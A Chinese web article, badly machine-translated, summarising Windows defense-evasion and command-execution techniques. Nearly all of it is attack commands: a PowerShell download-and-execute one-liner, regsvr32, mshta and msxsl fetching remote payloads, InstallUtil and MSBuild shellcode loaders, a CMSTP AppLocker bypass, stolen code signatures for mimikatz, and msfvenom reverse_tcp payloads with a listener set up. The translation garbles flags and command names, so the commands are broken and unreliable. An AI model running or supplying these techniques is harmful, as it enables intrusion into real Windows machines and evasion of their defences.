正在閱讀:Windows命令執(zhí)行防御規(guī)避總結(jié)Windows命令執(zhí)行防御規(guī)避總結(jié)

2022-01-04 16:01 出處:其他 作者:佚名 責(zé)任編輯:yuhaohui

今天小編為大家?guī)鞼indows命令執(zhí)行防御規(guī)避總結(jié), 具體如下:

 powershell

 
powershell.exe-nop-w隱藏-c”IEX。downloadstring(' http://xx . xx . xx . xx:8888/logo . gif ')\ "/f
 
啜飲
 
通過sip劫持從惡意代碼簽名中獲得系統(tǒng)信任的Https://github.com/secretsquirrel/SigThief
 
consent.exe-mimikatz.exe-signed-mimikatz.exe
 
rundll32.exe
 
產(chǎn)生
 
xxx.dll
 
目標(biāo)執(zhí)行
 
rundll32.exe外殼32.dll,xxx.dll控件
 
Regsvr32.exe
 
msfconsole
 
輔助/服務(wù)器/regsvr 32 _ command _ delivery _ server
 
設(shè)置CMD網(wǎng)絡(luò)用戶測(cè)試123456 /add
 
目標(biāo)執(zhí)行
 
regsvr 32/s/n/u/I:http://xx . xx . xx . xx:8080/APxob0o scrobj.dll
 
InstallUtil.exe
 
1.編譯后門:
 
c:\ Windows \微軟。csc.exe/r:系統(tǒng)。EnterpriseServices.dll/不安全/目標(biāo):庫/輸出:XXX . exe/key file:“C:\ Program Files(x86)\ Microsoft SDKs \ Windows \ v 10.0a \ bin \ NETFX 4.8 Tools \ x64 \ key . snk”XXX . cs
 
2.在無人機(jī)上運(yùn)行:
 
InstallUtil.exe/xxx.exe大學(xué)
 
3.msf監(jiān)控并獲取彈殼:
 
設(shè)置有效負(fù)載窗口/x64/meterpreter/reverse_tcp
 
設(shè)置LHOST xx.xx.xx.xx
 
設(shè)置LPORT 4444
 
剝削
 
Msbuild.exe
 
MSBuild是微軟Build Engine的縮寫,代表了微軟和Visual Studio的新一代平臺(tái)。MSBuild可以編譯特定格式的xml文件。
 
https://github.com/3gstudent/msbuild-inline-task
 
Msf生成外殼代碼
 
msfvene-p windows/x64/meter preter/reverse _ TCP lhost = xx . xx . xx . xx lport = 4444
 
f-csharp
 
使用shellcode替換https://github.com/3g學(xué)生/msbuild-inline-task/blob/master/executes % 20x 64% 20 shellcode . XML中的shellcode部分。
 
Msf監(jiān)控
 
使用利用/多重/處理程序
 
設(shè)置有效負(fù)載窗口/x64/meterpreter/reverse_tcp
 
設(shè)置lhost xx.xx.xx.xx
 
設(shè)置lport 4444
 
剝削
 
奔跑
 
c:\ Windows \微軟。. NET \ Framework \ v 4 . 0 . 30319 \ MsBuild . exe exec 64 . XML
 
CMSTP
 
Cmstp.exe/s/ns c:\ users \ administrator \ appdata \ local \ temp \ xknqbpzl . txt繞過AppLocker并啟動(dòng)惡意腳本。
 
Mshta.exe
 
Mshta.exe是一個(gè)執(zhí)行微軟HTML應(yīng)用程序的實(shí)用程序(HTA)。攻擊者可以使用mshta.exe通過受信任的Windows實(shí)用程序代理執(zhí)行惡意代碼。
 
使用漏洞/windows/misc/hta_server
 
msf漏洞利用(windows/misc/hta_server)】設(shè)置srvhost xx.xx.xx.xx
 
msf漏洞利用(windows/misc/hta_server)】漏洞利用
 
mshta.exe·http://xx.xx.xx.xx:8080/xxxxxxx.hta
 
控制面板
 
攻擊者可以使用控制面板項(xiàng)目作為有效負(fù)載來執(zhí)行任意命令?刂泼姘屙(xiàng)目是注冊(cè)的可執(zhí)行文件(。exe)或控制面板(。cpl)文件,可以直接從命令行執(zhí)行,也可以通過Control_RunDLL(API)調(diào)用,或者直接雙擊。
 
攻擊者構(gòu)建惡意dll文件CPIApplet.dll。
 
用msf生成dll文件:
 
msfvene-p windows/x64/meter preter/reverse _ TCP LHOST = 170 . 170 . 64 . 17 LPORT = 4444-f dll ”/ tmp/CPIapplet . dll
 
將其傳遞到windows機(jī)器中,然后將其重命名為CPIApplet.cpl,并通過control.exe c:\ user \ administrator \ desktop \ CPI applet . CPL執(zhí)行該命令。
 
msxsl.exe通過調(diào)用惡意xml文件來執(zhí)行腳本
 
制作兩個(gè)文件。
 
customers.xml
 
script.xsl
 
http://www.w3.org/1999/XSL/Transform"
 
xmlns:msxsl = " urn:schemas-Microsoft-com:XSLT "
 
用戶=“http://mycompany.com/mynamespace"》
 
函數(shù)xml(節(jié)點(diǎn)列表){ 0
 
var r = new ActiveXObject("WScript。外殼”)。run(" cmd.exe/k calc . exe ");
 
返回nodelist.nextNode()。xml
 
}
 
打開http服務(wù)
 
python3 -m http.server 80
 
遠(yuǎn)程下載執(zhí)行
 
msxsl.exe·http://xx.xx.xx.xx/customers.xml·http://xx.xx.xx.xx/scrip.xsl

 

 

Windows11系統(tǒng)軟件版本:22000.51 預(yù)覽版系統(tǒng)工具立即查看

為您推薦

加載更多
加載更多
加載更多
加載更多
加載更多
加載更多
加載更多
加載更多
加載更多

關(guān)注我們

最新資訊離線隨時(shí)看 聊天吐槽贏獎(jiǎng)品